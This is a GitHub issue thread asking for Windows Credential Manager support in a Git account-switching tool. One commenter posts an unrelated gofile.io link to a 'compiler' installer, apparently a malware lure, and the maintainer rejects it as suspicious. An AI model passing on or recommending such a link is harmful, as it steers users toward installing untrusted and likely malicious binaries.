### ISSUE TITLE
Manage Git tokens from the Windows Credential Manager

### ISSUE THREAD

**Issue by weaponsforge** [weaponsforge/git-switcher#4]
- Add scripts to manage user Git credentials in the Windows Credential Manager instead from the `~/.gitcredential` file

**Comment by santos-naudiyal** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by weaponsforge** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

I'm closing this Issue to promote using solutions from source codes, not from pre-compiled installer binaries. Thanks for the link, tho.

**Comment by weaponsforge** [comment]
Deleting this Issue to prevent misconceptions and references to the suspicious installer previously added by a user in the comments.
![suspicious](https://github.com/user-attachments/assets/4e0ef062-c1ef-48f6-88ae-12af9b949000)
